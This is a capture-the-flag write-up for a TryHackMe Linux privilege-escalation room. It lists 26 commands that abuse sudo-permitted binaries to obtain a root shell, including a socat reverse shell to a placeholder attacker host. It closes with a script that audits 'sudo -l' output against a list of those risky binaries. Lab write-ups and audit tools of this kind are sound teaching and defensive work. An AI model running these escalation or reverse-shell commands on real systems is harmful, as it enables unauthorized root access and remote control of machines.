70+ WAYS TO GET ROOT — LINUX PRIVILEGE ESCALATION
This write-up covers getting a root shell on Linux and is based on the Linux Privesc Playground room on https://tryhackme.com/
Log in to the box using the SSH credentials given in the room's details on THM.
Here is the list of all the ways I could think of at the time of solving this:
1. nmap --interactive then !sh
2. echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
3. sudo awk 'BEGIN {system("/bin/sh")}'
4. sudo find /home -exec /bin/bash \;
5. sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
6. sudo less /etc/hosts then !/bin/bash
7. sudo bash
8. sudo perl -e 'exec "/bin/bash";'
9. sudo python -c 'import pty;pty.spawn("/bin/bash")'
10. sudo man man
!/bin/bash
11. sudo vi
:!/bin/bash
12. sudo vim -c '!sh'
13. sudo env /bin/bash
14. sudo ftp
!/bin/bash
15. On Attacker Machine run:
socat file:`tty`,raw,echo=0 tcp-listen:1234
then on Target Machine run:
sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:1234
16. sudo /bin/bash -p
17. sudo -s
18. sudo php -r "system('/bin/sh');"
19. sudo strace -o /dev/null /bin/sh
20. sudo xargs -a /dev/null sh
21. sudo timeout --foreground 7d /bin/sh
22. sudo expect -c 'spawn /bin/sh;interact'
23. sudo ionice /bin/sh
24. sudo /usr/bin/time /bin/sh
25. sudo taskset 1 /bin/sh
26. sudo flock -u / /bin/sh
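
Every entry above depends on a sudo rule that grants one of these binaries as root. The script below is an added example, not part of the original write-up: it reads `sudo -l` output and flags grants for the binaries listed above. The function names, the RISKY list variable and the sample output are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag sudo grants for binaries that can hand out a root shell.
# RISKY is built from the binaries used in the list above.
RISKY="nmap awk find tar less bash perl python man vi vim env ftp socat php strace xargs timeout expect ionice time taskset flock"

# Constructed sample of `sudo -l` output (user and host names are made up).
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for alice on box:
    env_reset, mail_badpass

User alice may run the following commands on box:
    (root) NOPASSWD: /usr/bin/find, /usr/bin/systemctl status nginx
    (ALL : ALL) /usr/bin/python3 /opt/report.py
    (root) /usr/bin/tar -czf /backup/*
EOF
}

# Reads `sudo -l` style output on stdin and prints "binary: command" per risky grant.
audit_sudo_rules() {
    # Keep only rule lines "(runas) [TAG:] cmd, cmd", drop "(runas)", one command per line.
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*//p' | tr ',' '\n' |
    while IFS= read -r cmd; do
        # Strip leading blanks and tags such as NOPASSWD: or SETENV:
        cmd=$(printf '%s\n' "$cmd" | sed -e 's/^[[:space:]]*//' -e 's/^\([A-Z_]*:[[:space:]]*\)*//')
        path=${cmd%% *}
        [ -n "$path" ] || continue
        if [ "$path" = "ALL" ]; then
            printf 'ALL: unrestricted sudo\n'
            continue
        fi
        # Basename without a version suffix, so python3 or python2.7 count as python.
        base=$(printf '%s\n' "${path##*/}" | sed 's/[0-9.]*$//')
        case " $RISKY " in
            *" $base "*) printf '%s: %s\n' "$base" "$cmd" ;;
        esac
    done
}

# Demo on the constructed sample; on a real host use: sudo -l | audit_sudo_rules
sample_sudo_l | audit_sudo_rules
```

Each flagged line is a rule to remove or replace with a narrowly scoped wrapper, since restricting arguments does not stop these binaries from launching a shell.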